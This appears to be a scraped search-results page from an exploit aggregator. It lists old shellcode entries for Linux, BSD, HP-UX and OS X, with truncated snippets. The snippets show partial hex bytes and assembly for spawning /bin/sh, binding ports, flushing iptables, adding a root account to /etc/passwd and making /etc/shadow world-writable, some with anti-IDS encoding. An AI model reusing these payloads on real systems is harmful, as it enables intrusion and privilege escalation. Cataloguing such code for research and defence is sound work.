Lucene search
+L

7546 matches found

Exploit DB
Exploit DB
added 2004/09/26 12:00 a.m.28 views

bsdi/x86 - execve /bin/sh 45 bytes

bsdi/x86 execve /bin/sh 45 bytes. Shellcode exploit for bsdix86 platform / BSDi execve of /bin/sh by duke [email protected] / char bsdishell= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76" "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07"...

0.4AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/26 12:00 a.m.22 views

linux/x86 portbind port 5074 toupper 226 bytes

No description provided by source. / Bindshell puerto 5074 TOUPPER EVASION 226 bytes Bindshell original: Matias Sedalo 92 bytes La binshell esta codificada usando 2 bytes para representar 1 byte original de la siguiente forma: byte original: 0xAB 0x41 + 0xA = 0x4B; 0x41 + 0xB = 0x4C byte...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/26 12:00 a.m.26 views

linux/x86 iptables -F 45 bytes

No description provided by source. / 06/03/2003 45 bytes to flush iptables. execve/sbin/iptables -F by UnboundeD greetz to s0t4ipv6. / char shellcode = "\x31\xd2" // xorl %edx,%edx "\x52" // pushl %edx "\x66\x68\x2d\x46" // pushw $0x462d "\x89\xe6" // movl %esp,%esi "\x52" // pushl %edx...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/26 12:00 a.m.32 views

freebsd/x86 - execve /tmp/sh 34 bytes

freebsd/x86 execve /tmp/sh 34 bytes. Shellcode exploit for freebsdx86 platform / FreeBSD shellcode - execve /tmp/sh Claes M. Nyberg 20020120 , / / void main asm" xorl %eax, %eax eax = 0 pushl %eax string ends with NULL pushl $0x68732f2f push 'hs//' //sh pushl $0x706d742f push 'pmt/' /tmp movl %es...

0.1AI score
SaveExploits0
zdt
zdt
added 2004/09/26 12:00 a.m.88 views

bsd/PPC execve /bin/sh 128 bytes

Exploit for bsd/ppc platform in category shellcode ================================ bsd/PPC execve /bin/sh 128 bytes ================================ / Linux PPC shellcode execve of /bin/sh by Palante / long shellcode = / Palante's BSD PPC shellcode w/ NULL/ 0x7CC63278, 0x2F867FFF, 0x41BC005C,...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/26 12:00 a.m.16 views

bsd/x86 break chroot 45 bytes

No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 45 bytes. -break chrooted / char shellcode= "\x68\x62\x2e\x2e\x2e" / pushl $0x2e2e2e62 / "\x89\xe7" / movl %esp,%edi / "\x33\xc0" / xorl %eax,%eax / "\x88\x47\x03" / movb %al,0x3%edi / "\x57" /...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/26 12:00 a.m.24 views

linux/x86 add user t00r ENCRYPT 116 bytes

No description provided by source. / !!!!!! ANTI IDS SHELLCODE !!!!!! [email protected] 0x14abril0x7d2 !!!!! ENCRIPTADA !!!!! 116 bytes Agrega la linea "t00r::0:0::/:/bin/sh" en /etc/passwd !!!!! ENCRIPTADA !!!!! Para mas informacion Descargue...

7.1AI score
SaveExploits0
zdt
zdt
added 2004/09/26 12:00 a.m.21 views

os-x/PPC create /tmp/suid 122 bytes

Exploit for os-x/ppc platform in category shellcode =================================== os-x/PPC create /tmp/suid 122 bytes =================================== / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does open; write; close; exit; See ASM below. 122 Bytes. / char shellcode =...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/26 12:00 a.m.24 views

linux/x86 connect 120 bytes

linux/x86 connect 120 bytes. Shellcode exploit for linx86 platform / Connecting shellcode written by lamagra http://lamagra.seKure.de May 2000 .file "connect" .version "01.01" .text .align 4 start: socketAFINET,SOCKSTREAM,IPPROTOIP; movl %esp,%ebp xorl %edx,%edx movb $102,%edx movl %edx,%eax 102 ...

SaveExploits0
zdt
zdt
added 2004/09/26 12:00 a.m.27 views

linux/x86 symlink /bin/sh xoring 56 bytes

Exploit for linux/x86 platform in category shellcode ========================================= linux/x86 symlink /bin/sh xoring 56 bytes ========================================= /The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. short version with anti IDS...

7AI score
SaveExploits0
zdt
zdt
added 2004/09/26 12:00 a.m.17 views

linux/x86 execve /bin/sh alphanumeric 392 bytes

Exploit for linux/x86 platform in category shellcode =============================================== linux/x86 execve /bin/sh alphanumeric 392 bytes =============================================== / Linux/x86 execve of /bin/sh you can put 0-200 nops before shellcode nop = 0x47 = 'G' / char shellc...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/26 12:00 a.m.19 views

bsd/x86 execve /bin/sh Crypt /bin/sh 49 bytes

No description provided by source. / Self decripting dec/inc shellcode executes /bin/sh Size 49 bytes OS BSD /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short shellcode main: pop esi xor ecx,ecx mov cl,28 maindecript: inc byte esi+ecx loop maindecript inc byte esi push esi...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/26 12:00 a.m.21 views

linux/x86 iptables -F 58 bytes

No description provided by source. / The shellcode flushs the iptables by running /sbin/iptables -F no exit greetz to zilion: man, my code is shorter! size = 58 bytes OS = Linux i386 written by /rootteam/dev0id www.sysworld.net BITS 32 jmp short callme main: pop esi xor eax,eax mov byte esi+14,al...

7.1AI score
SaveExploits0
zdt
zdt
added 2004/09/26 12:00 a.m.41 views

bsd/x86 execve /bin/sh ENCRYPT* 57 bytes

Exploit for bsd/x86 platform in category shellcode ======================================== bsd/x86 execve /bin/sh ENCRYPT 57 bytes ======================================== / BSD version FreeBSD, OpenBSD, NetBSD. email protected 57 bytes. -Encriptado execve/bin/sh; Para mas informacion ver...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/26 12:00 a.m.35 views

linux/x86 symlink . /bin/sh 32 bytes

linux/x86 symlink . /bin/sh 32 bytes. Shellcode exploit for linx86 platform /The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. short version size = 32 bytes OS = BSD written by /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme mai...

0.2AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/26 12:00 a.m.22 views

linux/x86 chmod 666 /etc/shadow 41 bytes

No description provided by source. / [email protected] 0x04abril0x7d2 int syschmodconst char filename, modet mode ... Utilizando la interrupcion 15chmod, asignando el octal 0666 al archivo deseado. En este caso /etc/shadow Hice unas modificaciones en el codigo y solo pude reducir la...

7.1AI score
SaveExploits0
zdt
zdt
added 2004/09/26 12:00 a.m.17 views

HPUX execve /bin/sh 58 bytes

Exploit for hpux platform in category shellcode ============================ HPUX execve /bin/sh 58 bytes ============================ / Hp-Ux execve of /bin/sh by K2 / uchar shellcode = "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/26 12:00 a.m.24 views

linux/x86 eject /dev/cdrom 64 bytes

No description provided by source. / CDROM EJECTING CODE by lamagra .data .globl main .type main,@function start: setreuid 0, 0 xorl %eax,%eax xorl %ebx,%ebx xorl %ecx,%ecx xorl %edx,%edx movb $70,%al int $0x80 jmp 0x21 popl %esi movb %edx,10%esi leal %esi, %ebx open"/dev/cdrom",...

7.1AI score
SaveExploits0
zdt
zdt
added 2004/09/26 12:00 a.m.16 views

linux/x86 execve /bin/sh IA32 0xff-less 45 bytes

Exploit for linux/x86 platform in category shellcode ================================================ linux/x86 execve /bin/sh IA32 0xff-less 45 bytes ================================================ / 0xff-less execve /bin/sh by anathema / include include unsigned char code = / Linux/IA32...

7AI score
SaveExploits0
zdt
zdt
added 2004/09/26 12:00 a.m.19 views

linux/x86 chmod 666 /etc/shadow 82 bytes

Exploit for linux/x86 platform in category shellcode ======================================== linux/x86 chmod 666 /etc/shadow 82 bytes ======================================== / email protected Usando execve y un array de punteros include main char name4; name0="/bin/chmod"; name1="666";...

7AI score
SaveExploits0
Rows per page
Query Builder